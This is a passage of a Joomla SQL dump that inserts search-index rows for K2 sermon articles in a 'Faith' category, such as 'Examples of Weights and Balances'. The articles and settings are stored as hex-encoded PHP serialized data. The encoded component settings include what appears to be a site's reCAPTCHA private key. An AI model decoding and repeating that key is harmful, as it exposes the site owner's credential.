70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223136223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33313a2233383a7265636f676e697a696e672d7468652d646976696e652d7363616c65223b733a373a22636174736c7567223b733a373a22323a6661697468223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a34393a22636f6d706f6e656e742f6b322f6974656d2f33382d7265636f676e697a696e672d7468652d646976696e652d7363616c65223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a353a224661697468223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a353a224661697468223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3338223b733a353a22726f757465223b733a36383a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d33383a7265636f676e697a696e672d7468652d646976696e652d7363616c65223b733a353a227469746c65223b733a32383a225265636f676e697a696e672074686520446976696e65205363616c65223b733a31313a226465736372697074696f6e223b733a3230373a222054657874733a20312053616d75656c20323a332c2050726f76657262732031363a322c204973616961682032363a3720312053616d75656c20323a332054616c6b206e6f206d6f726520736f20657863656564696e672070726f75646c793b206c6574206e6f74206172726f67616e637920636f6d65206f7574206f6620796f7572206d6f7574683a20666f7220746865204c4f5244206973206120476f64206f66206b6e6f776c656467652c20616e642062792068696d20616374696f6e732061726520776569676865642e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30342d30322030383a35313a3030223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30342d30322030383a35313a3030223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(248, 'index.php?option=com_k2&view=item&id=40', 'index.php?option=com_k2&view=item&id=40:examples-of-weights-and-balances', 'Examples of Weights and Balances', ' Texts: 2 Cor. 13:5, Prov.6:2, Is 1:15-17, Rom.6:12, 1Sam 6:7 Introduction Always put it in mind that the terms weight, scales and balances mean justice, right conscience, correct standard, being straight, qualities that make a man acceptable etc. Let’s see few examples of people that put themselves on the scale and measured up according to God’s standards. ', '2017-06-25 14:18:35', 'ecccd407f8d6d922ed90fd64c487003b', 1, 1, 1, '*', '2017-04-02 11:31:40', '0000-00-00 00:00:00', '2017-04-02 11:31:40', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223430223b733a353a22616c696173223b733a33323a226578616d706c65732d6f662d776569676874732d616e642d62616c616e636573223b733a373a2273756d6d617279223b733a3431323a223c703e54657874733a203220436f722e2031333a352c2050726f762e363a322c20497320313a31352d31372c20526f6d2e363a31322c203153616d20363a373c2f703e0d0a3c703e3c7374726f6e673e496e74726f64756374696f6e3c2f7374726f6e673e3c2f703e0d0a3c703e416c776179732070757420697420696e206d696e64207468617420746865207465726d73207765696768742c207363616c657320616e642062616c616e636573206d65616e206a7573746963652c20726967687420636f6e736369656e63652c20636f7272656374207374616e646172642c206265696e672073747261696768742c207175616c69746965732074686174206d616b652061206d616e2061636365707461626c65206574632e3c2f703e0d0a3c703e4c6574e28099732073656520666577206578616d706c6573206f662070656f706c65207468617420707574207468656d73656c766573206f6e20746865207363616c6520616e64206d65617375726564207570206163636f7264696e6720746f20476f64e2809973207374616e64617264732e3c2f703e0d0a223b733a343a22626f6479223b733a313736333a220d0a3c703e2d2053616d75656c2d203153616d2e31323a332d353c2f703e0d0a3c703e53616d75656c20636f756c6420636f6e666964656e746c792074616c6b206f662068697320696e74656772697479206265666f726520746865206e6174696f6e206f662049737261656c2c20616e64207468657920616c6c2074657374696669656420746861742068652077617320612074727565206d616e206f6620696e746567726974792e3c2f703e0d0a3c703e2d204a657375732d204d6174742e31363a31332d31363c2f703e0d0a3c703e4279207768617420746865792073617720486973206c6966652c20697420776173206e6f7420646966666963756c7420746f20636f6e636c756465207468617420486520776173204368726973742e20486973206c696665206265666f7265207468656d206f70656e6564207468656d20757020746f2074686520726967687420666c6f77206265666f726520476f642e3c2f703e0d0a3c703e2d205061756c2031436f722e393a312d32373c2f703e0d0a3c703e486520636f756c642074616c6b206f6620686973206c69666520616e64206d696e69737472792c2065766572797468696e6720646f6e6520696e206120626c616d656c657373206d616e6e65722c206361726566756c6c792c206c61626f7572696e672077697468206e6f20636f6d70726f6d6973652077686174736f657665722e3c2f703e0d0a3c703e2d20526563686162697465732d204a65722e33353a312d31323c2f703e0d0a3c703e5468657920626563616d6520476f64e2809973206578616d706c65206f6620612070656f706c6520746861742077696c6c206265206f62656469656e7420746f20746865697220666174686572e280997320696e737472756374696f6e206e6f206d6174746572207468652070726573737572652066726f6d20616e7977686572652e3c2f703e0d0a3c703e5768656e20476f64207765696768732061206d616e2c2068652065697468657220706173736573206f7220676574732070726f6d6f7465642c206f7220686520697320666f756e642077616e74696e672c20692e652e20776569676873206c657373207468616e20657870656374656420616e642068652069732073657420736964652c206e6f742066697420666f7220746865206d6173746572e2809973207573652e3c2f703e0d0a3c703e5468652070656f706c652077652068617665206c6f6f6b6564206174206c69766564207468656972206c697665732c207765696768696e67207468656d73656c76657320616c726561647920627920746865204c6f7264e2809973207374616e6461726420736f207468657920636f756c64206d6561737572652075702e3c2f703e0d0a3c703e54686579206469646ee2809974206c69766520746f2076696f6c61746520746865697220636f6e736369656e63652c206e6f722063686f6f73652074686520706c656173757265206f662074686520776f726c642061626f766520746865206b696e67646f6d206f6620476f64e28099732076616c75652073797374656d2e20496620796f75206a7564676520796f757273656c662c20796f75e280996c6c206e6f74206265206a75646765642e2031436f722e31313a33303c2f703e0d0a3c703e3c7374726f6e673e4578616d696e6520796f757273656c663c2f7374726f6e673e3c2f703e0d0a3c703e496620796f75206272696e6720476f64e280997320776f726420616e642074686520766f696365206f662074686520486f6c792053706972697420746f20626520746865207374616e64617264207769746820776869636820796f75206d65617375726520796f7572206c6966652c20796f75e280996c6c206e6576657220626520666f756e642077616e74696e672e2042757420696620796f75206d6f7665207769746820776f726c646c792066617368696f6e20616e64207374796c652c2074686520666c6573682064656d616e647320616e642068756d616e206578616d706c657320736f6d65206f662077686963682061726520736174616e6963616c6c7920696e737069726564206f7220666c6573686c7920676f7665726e6564206163636f7264696e6720746f204570682e323a312d322c207468656e20796f75e280996c6c20626520666f756e642077616e74696e67207768656e20796f75207374616e64206265666f726520476f642c206e6f7720696e2074696d65206f7220696e20657465726e6974792e3c2f703e0d0a3c703e4d616b6520476f64e280997320776f726420796f7572207363616c652c20796f7572207374616e6461726420616e6420796f75722072756c6520616e64206974207368616c6c2062652077656c6c207769746820796f7520696e204a65737573e28099206e616d653c2f703e223b733a353a226361746964223b733a313a2232223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30342d31372031373a32373a3238223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a323a223137223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a353a224661697468223b733a393a226361745f73746